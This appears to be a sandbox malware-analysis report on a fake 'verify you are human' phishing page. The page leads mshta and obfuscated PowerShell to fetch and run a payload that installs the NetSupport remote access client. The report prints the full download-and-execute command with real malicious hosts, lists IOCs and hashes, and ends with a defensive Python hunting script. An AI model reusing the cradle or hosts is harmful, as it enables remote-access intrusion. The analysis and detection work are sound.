Resubmissions

23-10-2024 01:15

241023-bmlphstemh 4

23-10-2024 00:50

241023-a65q3asfkh 4

23-10-2024 00:31

241023-at4y1asana 4

22-10-2024 14:58

241022-schzba1apc 10

22-10-2024 12:40

241022-pwj4yavgmd 10

Analysis

  • max time kernel
    112s
  • max time network
    113s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    22-10-2024 12:40

General

  • Target

    https://holidaybunch.com

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

https://holidaybunch.com/Ray-verify.html

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://traversecityspringbreak.com/o/o.png

Signatures

  • NetSupport

    NetSupport is a remote access tool sold as a legitimate system administration software.

  • Blocklisted process makes network request 6 IoCs
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 9 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Hide Artifacts: Hidden Files and Directories 1 TTPs 2 IoCs
  • Detected phishing page
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Gathers network information 2 TTPs 2 IoCs

    Uses commandline utility to view network configuration.

  • Suspicious behavior: EnumeratesProcesses 15 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of FindShellTrayWindow 26 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://holidaybunch.com
    1⤵
    • Enumerates system info in registry
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:4532
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9da5d46f8,0x7ff9da5d4708,0x7ff9da5d4718
      2⤵
        PID:4992
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2016,7984007047937855835,10109432745257710722,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2084 /prefetch:2
        2⤵
          PID:1880
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2016,7984007047937855835,10109432745257710722,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2316 /prefetch:3
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:4072
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2016,7984007047937855835,10109432745257710722,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2840 /prefetch:8
          2⤵
            PID:2600
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,7984007047937855835,10109432745257710722,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:1
            2⤵
              PID:3212
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,7984007047937855835,10109432745257710722,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1
              2⤵
                PID:2716
              • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2016,7984007047937855835,10109432745257710722,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4948 /prefetch:8
                2⤵
                  PID:1484
                • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2016,7984007047937855835,10109432745257710722,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4948 /prefetch:8
                  2⤵
                  • Suspicious behavior: EnumeratesProcesses
                  PID:3616
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,7984007047937855835,10109432745257710722,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5396 /prefetch:1
                  2⤵
                    PID:4560
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,7984007047937855835,10109432745257710722,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5392 /prefetch:1
                    2⤵
                      PID:1688
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,7984007047937855835,10109432745257710722,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5172 /prefetch:1
                      2⤵
                        PID:1664
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,7984007047937855835,10109432745257710722,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3456 /prefetch:1
                        2⤵
                          PID:3264
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2016,7984007047937855835,10109432745257710722,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=1268 /prefetch:8
                          2⤵
                            PID:3752
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,7984007047937855835,10109432745257710722,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5580 /prefetch:1
                            2⤵
                              PID:5400
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,7984007047937855835,10109432745257710722,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5560 /prefetch:1
                              2⤵
                                PID:5420
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,7984007047937855835,10109432745257710722,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5832 /prefetch:1
                                2⤵
                                  PID:1344
                              • C:\Windows\System32\CompPkgSrv.exe
                                C:\Windows\System32\CompPkgSrv.exe -Embedding
                                1⤵
                                  PID:852
                                • C:\Windows\System32\CompPkgSrv.exe
                                  C:\Windows\System32\CompPkgSrv.exe -Embedding
                                  1⤵
                                    PID:3472
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
                                    1⤵
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:5884
                                    • C:\Windows\system32\mshta.exe
                                      "C:\Windows\system32\mshta.exe" https://holidaybunch.com/Ray-verify.html
                                      2⤵
                                      • Blocklisted process makes network request
                                      • Checks computer location settings
                                      PID:3776
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://traversecityspringbreak.com/o/o.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X
                                        3⤵
                                        • Blocklisted process makes network request
                                        • Adds Run key to start application
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1320
                                        • C:\Windows\system32\ipconfig.exe
                                          "C:\Windows\system32\ipconfig.exe" /flushdns
                                          4⤵
                                          • Gathers network information
                                          PID:1240
                                        • C:\Windows\system32\cmd.exe
                                          "C:\Windows\system32\cmd.exe" /c attrib +h C:\Users\Admin\AppData\Roaming\XIcNnz
                                          4⤵
                                          • Hide Artifacts: Hidden Files and Directories
                                          PID:5296
                                          • C:\Windows\system32\attrib.exe
                                            attrib +h C:\Users\Admin\AppData\Roaming\XIcNnz
                                            5⤵
                                            • Views/modifies file attributes
                                            PID:4660
                                        • C:\Users\Admin\AppData\Roaming\XIcNnz\client32.exe
                                          "C:\Users\Admin\AppData\Roaming\XIcNnz\client32.exe"
                                          4⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          • System Location Discovery: System Language Discovery
                                          • Suspicious use of AdjustPrivilegeToken
                                          • Suspicious use of FindShellTrayWindow
                                          PID:2024
                                  • C:\Windows\system32\mshta.exe
                                    "C:\Windows\system32\mshta.exe" https://holidaybunch.com/Ray-verify.html #  ''Verify you are human - Ray Verification ID: 4457''
                                    1⤵
                                    • Blocklisted process makes network request
                                    • Checks computer location settings
                                    PID:5508
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://traversecityspringbreak.com/o/o.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X
                                      2⤵
                                      • Blocklisted process makes network request
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:5368
                                      • C:\Windows\system32\ipconfig.exe
                                        "C:\Windows\system32\ipconfig.exe" /flushdns
                                        3⤵
                                        • Gathers network information
                                        PID:5452
                                      • C:\Windows\system32\cmd.exe
                                        "C:\Windows\system32\cmd.exe" /c attrib +h C:\Users\Admin\AppData\Roaming\UNEFGB
                                        3⤵
                                        • Hide Artifacts: Hidden Files and Directories
                                        PID:5412
                                        • C:\Windows\system32\attrib.exe
                                          attrib +h C:\Users\Admin\AppData\Roaming\UNEFGB
                                          4⤵
                                          • Views/modifies file attributes
                                          PID:1776
                                      • C:\Users\Admin\AppData\Roaming\UNEFGB\client32.exe
                                        "C:\Users\Admin\AppData\Roaming\UNEFGB\client32.exe"
                                        3⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        • System Location Discovery: System Language Discovery
                                        PID:1800

Network

MITRE ATT&CK Enterprise v15

Downloads


                                    SHA512

                                    a02b2b0f43fef99513543d3be68c2fcad0dd6e66aa6c63e58f9874a51c27f58cdac79c4d9059a92d6a3e5b5235c9ad294abd2716109335f917e7df092980bf8f

                                  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jncwi4zi.mas.ps1

                                    Filesize

                                    60B

                                    MD5

                                    d17fe0a3f47be24a6453e9ef58c94641

                                    SHA1

                                    6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                    SHA256

                                    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                    SHA512

                                    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                  • C:\Users\Admin\AppData\Roaming\XIcNnz\HTCTL32.DLL

                                    Filesize

                                    320KB

                                    MD5

                                    2d3b207c8a48148296156e5725426c7f

                                    SHA1

                                    ad464eb7cf5c19c8a443ab5b590440b32dbc618f

                                    SHA256

                                    edfe2b923bfb5d1088de1611401f5c35ece91581e71503a5631647ac51f7d796

                                    SHA512

                                    55c791705993b83c9b26a8dbd545d7e149c42ee358ecece638128ee271e85b4fdbfd6fbae61d13533bf39ae752144e2cc2c5edcda955f18c37a785084db0860c

                                  • C:\Users\Admin\AppData\Roaming\XIcNnz\NSM.LIC

                                    Filesize

                                    257B

                                    MD5

                                    7067af414215ee4c50bfcd3ea43c84f0

                                    SHA1

                                    c331d410672477844a4ca87f43a14e643c863af9

                                    SHA256

                                    2050cc232710a2ea6a207bc78d1eac66a4042f2ee701cdfeee5de3ddcdc31d12

                                    SHA512

                                    17b888087192bcea9f56128d0950423b1807e294d1c4f953d1bf0f5bd08e5f8e35afeee584ebf9233bfc44e0723db3661911415798159ac118c8a42aaf0b902f

                                  • C:\Users\Admin\AppData\Roaming\XIcNnz\PCICHEK.DLL

                                    Filesize

                                    18KB

                                    MD5

                                    a0b9388c5f18e27266a31f8c5765b263

                                    SHA1

                                    906f7e94f841d464d4da144f7c858fa2160e36db

                                    SHA256

                                    313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a

                                    SHA512

                                    6051a0b22af135b4433474dc7c6f53fb1c06844d0a30ed596a3c6c80644df511b023e140c4878867fa2578c79695fac2eb303aea87c0ecfc15a4ad264bd0b3cd

                                  • C:\Users\Admin\AppData\Roaming\XIcNnz\PCICL32.DLL

                                    Filesize

                                    3.6MB

                                    MD5

                                    00587238d16012152c2e951a087f2cc9

                                    SHA1

                                    c4e27a43075ce993ff6bb033360af386b2fc58ff

                                    SHA256

                                    63aa18c32af7144156e7ee2d5ba0fa4f5872a7deb56894f6f96505cbc9afe6f8

                                    SHA512

                                    637950a1f78d3f3d02c30a49a16e91cf3dfccc59104041876789bd7fdf9224d187209547766b91404c67319e13d1606da7cec397315495962cbf3e2ccd5f1226

                                  • C:\Users\Admin\AppData\Roaming\XIcNnz\client32.exe

                                    Filesize

                                    117KB

                                    MD5

                                    ee75b57b9300aab96530503bfae8a2f2

                                    SHA1

                                    98dd757e1c1fa8b5605bda892aa0b82ebefa1f07

                                    SHA256

                                    06a0a243811e9c4738a9d413597659ca8d07b00f640b74adc9cb351c179b3268

                                    SHA512

                                    660259bb0fd317c7fb76505da8cbc477e146615fec10e02779cd4f527aeb00caed833af72f90b128bb62f10326209125e809712d9acb41017e503126e5f85673

                                  • C:\Users\Admin\AppData\Roaming\XIcNnz\client32.ini

                                    Filesize

                                    617B

                                    MD5

                                    7c6854f484a279e9642d2daa9fbb9993

                                    SHA1

                                    dc6b5cf18eb9b38819eae455d3672eed0ef32c69

                                    SHA256

                                    11d81c68223fb9f7b0f6e67225aa6239a5ba84b2639294cf93b759fdcf30e35c

                                    SHA512

                                    557a1234d4c68ab49fc4757a4f85bf21b0f48c379f4ab9eba3d909d7d54f2052dcd19a0fafff0f5942b565ae2c089eeca7790ddf06aee1849a0b7477bfec5bc5

                                  • C:\Users\Admin\AppData\Roaming\XIcNnz\msvcr100.dll

                                    Filesize

                                    755KB

                                    MD5

                                    0e37fbfa79d349d672456923ec5fbbe3

                                    SHA1

                                    4e880fc7625ccf8d9ca799d5b94ce2b1e7597335

                                    SHA256

                                    8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18

                                    SHA512

                                    2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

                                  • C:\Users\Admin\AppData\Roaming\XIcNnz\pcicapi.dll

                                    Filesize

                                    32KB

                                    MD5

                                    dcde2248d19c778a41aa165866dd52d0

                                    SHA1

                                    7ec84be84fe23f0b0093b647538737e1f19ebb03

                                    SHA256

                                    9074fd40ea6a0caa892e6361a6a4e834c2e51e6e98d1ffcda7a9a537594a6917

                                    SHA512

                                    c5d170d420f1aeb9bcd606a282af6e8da04ae45c83d07faaacb73ff2e27f4188b09446ce508620124f6d9b447a40a23620cfb39b79f02b04bb9e513866352166

                                  • memory/5884-178-0x000001C53FAB0000-0x000001C540571000-memory.dmp

                                    Filesize

                                    10.8MB

                                  • memory/5884-149-0x000001C53FAB0000-0x000001C540571000-memory.dmp

                                    Filesize

                                    10.8MB

                                  • memory/5884-104-0x000001C558F60000-0x000001C558FD6000-memory.dmp

                                    Filesize

                                    472KB

                                  • memory/5884-103-0x000001C558E90000-0x000001C558ED4000-memory.dmp

                                    Filesize

                                    272KB

                                  • memory/5884-254-0x000001C53FAB0000-0x000001C540571000-memory.dmp

                                    Filesize

                                    10.8MB

                                  • memory/5884-102-0x000001C558A90000-0x000001C558AB2000-memory.dmp

                                    Filesize

                                    136KB
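The dropped-file list above is the hunting material for this sample: the NetSupport client (client32.exe, client32.ini, NSM.LIC, PCICL32.DLL, HTCTL32.DLL, PCICHEK.DLL, pcicapi.dll, msvcr100.dll) written to a randomly named directory under AppData\Roaming. Because NetSupport is sold as legitimate software, the executable and DLL hashes alone can also belong to a sanctioned install; the stronger signal is the component set sitting together in a per-user Roaming directory. The script below is an added example written for this page, not part of the sandbox report and not NetSupport's own code. It implements two tiers: an exact SHA-256 match against the hashes listed above, and a "component cluster" check that fires when at least MIN_COMPONENTS of the NetSupport file names share one directory. The directory tree it scans is constructed in a temp folder with placeholder bytes (so the hash tier does not fire on it); the threshold of 3 and the helper names are the author's choices, not anything from the report.

```python
"""Hunt for the NetSupport drop described in the dropped-file list above.

Tier 1: exact SHA-256 match against the hashes listed on the page.
Tier 2: several NetSupport client component names in one directory.
"""
import hashlib
import os
import tempfile
from pathlib import Path

# SHA-256 values copied from the dropped-file list on this page (Roaming\XIcNnz).
PAGE_SHA256 = {
    "06a0a243811e9c4738a9d413597659ca8d07b00f640b74adc9cb351c179b3268": "client32.exe",
    "11d81c68223fb9f7b0f6e67225aa6239a5ba84b2639294cf93b759fdcf30e35c": "client32.ini",
    "2050cc232710a2ea6a207bc78d1eac66a4042f2ee701cdfeee5de3ddcdc31d12": "NSM.LIC",
    "63aa18c32af7144156e7ee2d5ba0fa4f5872a7deb56894f6f96505cbc9afe6f8": "PCICL32.DLL",
    "edfe2b923bfb5d1088de1611401f5c35ece91581e71503a5631647ac51f7d796": "HTCTL32.DLL",
    "313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a": "PCICHEK.DLL",
    "9074fd40ea6a0caa892e6361a6a4e834c2e51e6e98d1ffcda7a9a537594a6917": "pcicapi.dll",
    "8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18": "msvcr100.dll",
}

# NetSupport client components (lower-cased for case-insensitive matching).
NETSUPPORT_COMPONENTS = {
    "client32.exe", "client32.ini", "nsm.lic", "pcicl32.dll",
    "htctl32.dll", "pcichek.dll", "pcicapi.dll",
}
MIN_COMPONENTS = 3  # author's threshold, not from the report


def sha256_file(path):
    """Streamed SHA-256 so the 3.6MB PCICL32.DLL does not need to fit in one read."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            digest.update(chunk)
    return digest.hexdigest()


def scan(root):
    """Walk root and return (hash_hits, cluster_hits).

    hash_hits:    [(path, page_file_name)] for exact SHA-256 matches
    cluster_hits: [(directory, sorted component names)] where at least
                  MIN_COMPONENTS NetSupport components share one directory
    """
    hash_hits, cluster_hits = [], []
    for dirpath, _dirs, files in os.walk(root):
        present = {f.lower() for f in files} & NETSUPPORT_COMPONENTS
        if len(present) >= MIN_COMPONENTS:
            cluster_hits.append((dirpath, sorted(present)))
        for name in files:
            full = os.path.join(dirpath, name)
            digest = sha256_file(full)
            if digest in PAGE_SHA256:
                hash_hits.append((full, PAGE_SHA256[digest]))
    return hash_hits, cluster_hits


def build_constructed_tree():
    """Constructed stand-in for %AppData%\\Roaming: a randomly named directory
    (reusing the page's XIcNnz) holding placeholder files with the NetSupport
    names. Sample data only: the bytes are not the real payload, so only the
    cluster tier can fire on it."""
    root = tempfile.mkdtemp(prefix="netsupport_hunt_")
    drop = Path(root, "XIcNnz")
    drop.mkdir()
    for name in ("client32.exe", "client32.ini", "NSM.LIC", "PCICL32.DLL", "HTCTL32.DLL"):
        (drop / name).write_bytes(b"constructed placeholder: " + name.encode())
    # A benign neighbour (mimics the Edge 'Local State' entry) that must not trigger.
    Path(root, "Microsoft").mkdir()
    Path(root, "Microsoft", "Local State").write_bytes(b"{}")
    return root


if __name__ == "__main__":
    tree = build_constructed_tree()
    hits, clusters = scan(tree)
    for directory, components in clusters:
        print("NetSupport component cluster:", directory, components)
    for path, page_name in hits:
        print("SHA-256 matches page IOC for", page_name, "at", path)
```

On a real host, point scan() at the user's AppData\Roaming (or the whole profile) and review every cluster hit, then confirm with the hash tier: a hash match ties the files to this exact sample, while a cluster hit without hash matches usually means a re-packaged NetSupport drop with a different client32.ini or NSM.LIC.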